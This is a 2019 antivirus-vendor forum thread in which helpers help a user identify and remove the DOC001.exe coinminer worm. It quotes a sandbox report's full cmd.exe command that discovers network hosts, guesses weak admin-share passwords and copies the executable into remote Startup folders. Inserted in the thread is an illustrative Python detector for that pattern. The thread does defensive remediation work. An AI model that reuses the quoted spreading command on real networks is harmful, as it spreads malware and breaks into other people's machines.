Gerald KAmande 0 Posted May 23, 2019 Share Posted May 23, 2019 Been hit by the DC002. Exe virus. Any help on how I can remove it?
Administrators Marcos 5,235 Posted May 23, 2019 Administrators Share Posted May 23, 2019 Is that "DC002. Exe" a name of a file? Is it detected by ESET? If not, please submit it to ESET for analysis as per FAQ on the right-hand side of this forum.
Gerald KAmande 0 Posted May 23, 2019 Author Share Posted May 23, 2019 Sorry, file name DC001.exc
Administrators Marcos 5,235 Posted May 23, 2019 Administrators Share Posted May 23, 2019 Have you also submitted logs as per the KB I referred to? Just knowing the file name doesn't tell anything.
Gerald KAmande 0 Posted May 23, 2019 Author Share Posted May 23, 2019 Tried to send the file, but it can't be attached as it's affected.
itman 1,742 Posted May 23, 2019 Share Posted May 23, 2019 If the file is DOC001.exe, it is possible the .exe is a coinminer: https://malwaretips.com/blogs/remove-doc001-exe/ . The first question is how did you know you were infected? Do you have Eset installed and it detected something? If so, there should be an entry or entries in the Eset Detection log related to this detection. You need to copy those detection entries and post them in this thread so we can identify the malware.
Administrators Marcos 5,235 Posted May 23, 2019 Administrators Share Posted May 23, 2019 So is it detected by ESET or not? If it is, under what name? If not, please submit it to samples[at]eset.com in an archive encrypted with the password "infected".
Gerald KAmande 0 Posted May 23, 2019 Author Share Posted May 23, 2019
itman said: The first question is how did you know you were infected?
I saw that drive C of most computers has that folder. Even if you delete it, it will reappear again.
itman said: Do you have Eset installed and it detected something?
I have Eset installed but it's not detecting.
itman said: If so, there should be an entry or entries in the Eset Detection log related to this detection. You need to copy those detection entries and post them in this thread so we can identify the malware.
Gerald KAmande 0 Posted May 23, 2019 Author Share Posted May 23, 2019 https://malwaretips.com/blogs/remove-doc001-exe/ . I have tried it; it detects, but the virus will still hit on those PCs.
itman 1,742 Posted May 23, 2019 Share Posted May 23, 2019 (edited) Submit doc001.exe to VirusTotal: https://www.virustotal.com/#/home/upload and see what security solutions there detect it.
1 hour ago, Gerald KAmande said: https://malwaretips.com/blogs/remove-doc001-exe/ . I have tried it; it detects, but the virus will still hit on those PCs.
Are you stating MBAM detects and removes the malware but it reappears? If so, when does it reappear? After a system restart? Also, after MBAM detected the malware, did you do this?
Quoted from the malwaretips article: When the scan has completed, you will be presented with a screen showing the malware infections that Malwarebytes has detected. To remove the malicious programs that Malwarebytes has found, click on the "Quarantine Selected" button.
Edited May 23, 2019 by itman
itman 1,742 Posted May 23, 2019 Share Posted May 23, 2019 There's a May 4, 2019 analysis of DOC001.exe at Malware-Analysis here: https://www.hybrid-analysis.com/sample/f23435192769e92a832e8eba0dd769fc50e23fb41f11cd647ea2c550520f2f68?environmentId=100 . AV detection of the malware is quite high. And it does maintain persistence in the various Win startup locations as noted below. Appears it has loaded itself into every one of them!
Quoted from the analysis report:
cmd.exe /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=DOC001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "%APPDATA%\Temps\DOC001.exe" "\\!s!\%j\DOC001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\%USERNAME%\AppData\Roaming\Temps\DOC001.exe" %d) & net use %c /delete /y & ping -n 20 localhost))) (PID: 652)
cmd.exe /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=DOC001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "%APPDATA%\Temp\DOC001.exe" "\\!s!\%j\DOC001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\%USERNAME%\AppData\Roaming\Temp\DOC001.exe" %d) & net use %c /delete /y & ping -n 20 localhost))) (PID: 3880)
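A defender-side check for the spreading behaviour visible in the command lines above, added here as an example and not part of this thread or of any vendor's tooling: three indicators (host discovery, a reference to the C$ or Users admin share, and an xcopy of an .exe into a Startup folder) are run over process-creation records, and a record is flagged only when most of them co-occur, since each one alone is routine administration. The record format and the sample command lines are constructed for illustration; record 652 reuses fragments of the DOC001.exe command line quoted in the post above.

```python
import re

# Constructed Sysmon-style process-creation records (assumed format, not real telemetry).
# Record 652 reuses fragments of the DOC001.exe command line quoted in this thread.
SAMPLE_EVENTS = [
    {"pid": 652, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a`) do set str_!random!=%i)& '
            r'(for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && '
            r'((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do '
            r'echo f|xcopy /y /d "%APPDATA%\Temps\DOC001.exe" %d) & net use %c /delete /y))'},
    {"pid": 1200, "image": r"C:\Windows\System32\cmd.exe",  # benign deployment copy to a file share
     "cmd": r'cmd.exe /c xcopy /y "D:\build\app.exe" "\\fileserver\share\app.exe"'},
    {"pid": 1300, "image": r"C:\Windows\System32\cmd.exe",  # benign share listing by an admin
     "cmd": r'cmd.exe /c net view \\fileserver'},
]

# Behaviours that co-occur in the worm's command line; any one alone is routine admin activity.
INDICATORS = {
    "host_discovery":  re.compile(r"\b(net\s+view|arp\s+-a)\b", re.I),
    "admin_share_ref": re.compile(r"\\\\\S+\\(C\$|Users)(?!\S)", re.I),
    # xcopy of an .exe somewhere in the line, and a Startup folder path somewhere in the line
    "startup_drop":    re.compile(r"^(?=.*\bxcopy\b.*\.exe)(?=.*Start Menu\\Programs\\Startup\\)",
                                  re.I | re.S),
}


def score_event(event):
    """Return the indicator names matched by one record's command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(event["cmd"])]


def find_worm_like(events, min_hits=2):
    """Flag records that match at least min_hits indicators, as (pid, matched) tuples."""
    flagged = []
    for ev in events:
        matched = score_event(ev)
        if len(matched) >= min_hits:
            flagged.append((ev["pid"], matched))
    return flagged


if __name__ == "__main__":
    for pid, matched in find_worm_like(SAMPLE_EVENTS):
        print(f"PID {pid} shows the DOC001.exe spreading pattern: {', '.join(matched)}")
```

On a real host the records would come from Sysmon event 1 or Windows event 4688 with command-line auditing enabled; the threshold is what keeps a lone xcopy or net view from paging anyone.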
Gerald KAmande 0 Posted May 24, 2019 Author Share Posted May 24, 2019
19 hours ago, itman said: Submit doc001.exe to VirusTotal: https://www.virustotal.com/#/home/upload and see what security solutions there detect it. Are you stating MBAM detects and removes the malware but it reappears? If so, when does it reappear? After a system restart? Also, after MBAM detected the malware, did you do this?
I have uploaded the file; see the attached results.
Administrators Marcos 5,235 Posted May 24, 2019 Administrators Share Posted May 24, 2019
0b36728a48fbff17a45be400c628052e6dca95fc - NSIS/CoinMiner.T trojan
NsCpuCNMiner32.exe - a variant of Win32/CoinMiner.DQ potentially unwanted application
NsCpuCNMiner64.exe - a variant of Win64/CoinMiner.CZ potentially unwanted application
The first one is an NSIS archive; the detection was added in April 2018. The other 2 executables (PUAs) are inside the NSIS archive; the detection was added in July 2017.
itman 1,742 Posted May 24, 2019 Share Posted May 24, 2019
1 hour ago, Marcos said: 0b36728a48fbff17a45be400c628052e6dca95fc - NSIS/CoinMiner.T trojan
TrendMicro has an article on how to permanently remove this coinminer here: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/worm_coinminer.inj . It does require some manual cleaning activities. Click on the "Solution" section. Substitute the "scan with TrendMicro" with a full in-depth scan using Eset Smart Security. If the above is too technically advanced for you, contact your regional Eset support concern for assistance: https://www.eset.com/int/
itman 1,742 Posted May 24, 2019 Share Posted May 24, 2019 (edited) For reference, SANS has an article on a malware sample using the NSIS installer here: https://isc.sans.edu/forums/diary/Quick+analysis+of+malware+created+with+NSIS/23703/ . I believe this particular coinminer malware was deployed via a self-executing SFX archive using something along this line: https://gist.github.com/xymopen/951ef3d5301af55efd82eb67af129066 . Make sure Eset's PUA protection is always enabled and don't ignore the warnings generated from it. It is far easier to prevent malware/nuisance-ware from being installed than trying to remove it later. Edited May 24, 2019 by itman